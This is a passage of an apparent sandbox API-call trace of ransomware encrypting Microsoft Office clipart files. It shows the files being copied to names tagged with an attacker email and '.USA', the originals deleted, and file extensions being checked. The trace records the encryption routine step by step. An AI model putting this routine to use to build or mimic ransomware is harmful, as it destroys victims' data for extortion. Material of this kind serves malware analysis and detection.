(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.312] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=296) returned 1 [0270.312] CloseHandle (hObject=0x328) returned 1 [0270.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf")) returned 0x20 [0270.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.313] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.313] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.313] GetLastError () returned 0x0 [0270.313] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x128, lpOverlapped=0x0) returned 1 [0270.314] WriteFile (in: hFile=0x388, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x130, lpOverlapped=0x0) returned 1 [0270.315] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.315] WriteFile (in: hFile=0x388, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.315] SetEndOfFile (hFile=0x388) returned 1 [0270.315] CloseHandle (hObject=0x388) returned 1 [0270.316] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.316] SetEndOfFile (hFile=0x328) returned 1 [0270.318] CloseHandle (hObject=0x328) returned 1 [0270.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.318] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf")) returned 1 [0270.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.319] lstrlenW (lpString=".doc") returned 4 [0270.319] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.319] lstrlenW (lpString=".docx") returned 5 [0270.319] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.319] lstrlenW (lpString=".pdf") returned 4 [0270.319] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.319] lstrlenW (lpString=".xls") returned 4 [0270.319] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.319] lstrlenW (lpString=".xlsx") returned 5 [0270.319] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.319] lstrlenW (lpString=".ppt") returned 4 [0270.319] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.319] lstrlenW (lpString=".zip") returned 4 [0270.319] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.319] lstrlenW (lpString=".rar") returned 4 [0270.319] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.319] lstrlenW (lpString=".bz2") returned 4 [0270.319] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.319] lstrlenW (lpString=".7z") returned 3 [0270.319] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.319] lstrlenW (lpString=".dbf") returned 4 [0270.319] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.319] lstrlenW (lpString=".1cd") returned 4 [0270.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.320] lstrlenW (lpString=".jpg") returned 4 [0270.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.320] lstrlenW (lpString=".doc") returned 4 [0270.320] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.320] lstrlenW (lpString=".docx") returned 5 [0270.320] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.320] lstrlenW (lpString=".pdf") returned 4 [0270.320] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.320] lstrlenW (lpString=".xls") returned 4 [0270.320] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.320] lstrlenW (lpString=".xlsx") returned 5 [0270.320] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.320] lstrlenW (lpString=".ppt") returned 4 [0270.320] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.320] lstrlenW (lpString=".zip") returned 4 [0270.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.320] lstrlenW (lpString=".rar") returned 4 [0270.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.320] lstrlenW (lpString=".bz2") returned 4 [0270.320] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.321] lstrlenW (lpString=".7z") returned 3 [0270.321] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.321] lstrlenW (lpString=".dbf") returned 4 [0270.321] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.321] lstrlenW (lpString=".1cd") returned 4 [0270.321] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0270.321] lstrlenW (lpString=".jpg") returned 4 [0270.321] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.321] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.321] lstrlenW (lpString="DD01631_.WMF") returned 12 [0270.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.321] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=552) returned 1 [0270.322] CloseHandle (hObject=0x328) returned 1 [0270.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf")) returned 0x20 [0270.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.322] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.322] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.322] GetLastError () returned 0x0 [0270.323] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x228, lpOverlapped=0x0) returned 1 [0270.323] WriteFile (in: hFile=0x388, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x230, lpOverlapped=0x0) returned 1 [0270.325] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.325] WriteFile (in: hFile=0x388, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.325] SetEndOfFile (hFile=0x388) returned 1 [0270.325] CloseHandle (hObject=0x388) returned 1 [0270.325] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.325] SetEndOfFile (hFile=0x328) returned 1 [0270.331] CloseHandle (hObject=0x328) returned 1 [0270.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.331] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf")) returned 1 [0270.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.332] lstrlenW (lpString=".doc") returned 4 [0270.332] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.332] lstrlenW (lpString=".docx") returned 5 [0270.332] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.332] lstrlenW (lpString=".pdf") returned 4 [0270.332] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.332] lstrlenW (lpString=".xls") returned 4 [0270.332] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.332] lstrlenW (lpString=".xlsx") returned 5 [0270.332] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.332] lstrlenW (lpString=".ppt") returned 4 [0270.332] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.332] lstrlenW (lpString=".zip") returned 4 [0270.332] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.332] lstrlenW (lpString=".rar") returned 4 [0270.332] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.332] lstrlenW (lpString=".bz2") returned 4 [0270.332] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.332] lstrlenW (lpString=".7z") returned 3 [0270.332] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.332] lstrlenW (lpString=".dbf") returned 4 [0270.333] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.333] lstrlenW (lpString=".1cd") returned 4 [0270.333] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.333] lstrlenW (lpString=".jpg") returned 4 [0270.333] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.333] lstrlenW (lpString=".doc") returned 4 [0270.333] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.333] lstrlenW (lpString=".docx") returned 5 [0270.333] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.333] lstrlenW (lpString=".pdf") returned 4 [0270.333] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.333] lstrlenW (lpString=".xls") returned 4 [0270.333] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.333] lstrlenW (lpString=".xlsx") returned 5 [0270.333] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.333] lstrlenW (lpString=".ppt") returned 4 [0270.333] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.333] lstrlenW (lpString=".zip") returned 4 [0270.333] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.333] lstrlenW (lpString=".rar") returned 4 [0270.333] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.333] lstrlenW (lpString=".bz2") returned 4 [0270.333] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.334] lstrlenW (lpString=".7z") returned 3 [0270.334] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.334] lstrlenW (lpString=".dbf") returned 4 [0270.334] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.334] lstrlenW (lpString=".1cd") returned 4 [0270.334] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0270.334] lstrlenW (lpString=".jpg") returned 4 [0270.334] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.334] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.334] lstrlenW (lpString="DD01761_.WMF") returned 12 [0270.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.335] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=4148) returned 1 [0270.335] CloseHandle (hObject=0x328) returned 1 [0270.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf")) returned 0x20 [0270.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.335] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.335] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.336] GetLastError () returned 0x0 [0270.336] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x1034, lpOverlapped=0x0) returned 1 [0270.339] WriteFile (in: hFile=0x3b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x1040, lpOverlapped=0x0) returned 1 [0270.404] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.404] WriteFile (in: hFile=0x3b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.404] SetEndOfFile (hFile=0x3b0) returned 1 [0270.405] CloseHandle (hObject=0x3b0) returned 1 [0270.405] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.405] SetEndOfFile (hFile=0x328) returned 1 [0270.407] CloseHandle (hObject=0x328) returned 1 [0270.407] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf")) returned 1 [0270.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.838] lstrlenW (lpString=".doc") returned 4 [0270.838] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.838] lstrlenW (lpString=".docx") returned 5 [0270.838] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.838] lstrlenW (lpString=".pdf") returned 4 [0270.839] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.839] lstrlenW (lpString=".xls") returned 4 [0270.839] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.839] lstrlenW (lpString=".xlsx") returned 5 [0270.839] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.839] lstrlenW (lpString=".ppt") returned 4 [0270.839] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.839] lstrlenW (lpString=".zip") returned 4 [0270.839] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.839] lstrlenW (lpString=".rar") returned 4 [0270.839] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.839] lstrlenW (lpString=".bz2") returned 4 [0270.839] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.839] lstrlenW (lpString=".7z") returned 3 [0270.839] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.839] lstrlenW (lpString=".dbf") returned 4 [0270.839] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.839] lstrlenW (lpString=".1cd") returned 4 [0270.839] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.839] lstrlenW (lpString=".jpg") returned 4 [0270.839] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.840] lstrlenW (lpString=".doc") returned 4 [0270.840] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.840] lstrlenW (lpString=".docx") returned 5 [0270.840] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.840] lstrlenW (lpString=".pdf") returned 4 [0270.840] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.840] lstrlenW (lpString=".xls") returned 4 [0270.840] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.840] lstrlenW (lpString=".xlsx") returned 5 [0270.840] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.840] lstrlenW (lpString=".ppt") returned 4 [0270.840] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.840] lstrlenW (lpString=".zip") returned 4 [0270.840] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.840] lstrlenW (lpString=".rar") returned 4 [0270.840] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.840] lstrlenW (lpString=".bz2") returned 4 [0270.840] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.840] lstrlenW (lpString=".7z") returned 3 [0270.840] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.840] lstrlenW (lpString=".dbf") returned 4 [0270.840] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.840] lstrlenW (lpString=".1cd") returned 4 [0270.840] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 63 [0270.841] lstrlenW (lpString=".jpg") returned 4 [0270.841] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.841] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.841] lstrlenW (lpString="EN00006_.WMF") returned 12 [0270.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.866] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=13936) returned 1 [0270.866] CloseHandle (hObject=0x3b0) returned 1 [0270.866] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf")) returned 0x20 [0270.937] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft 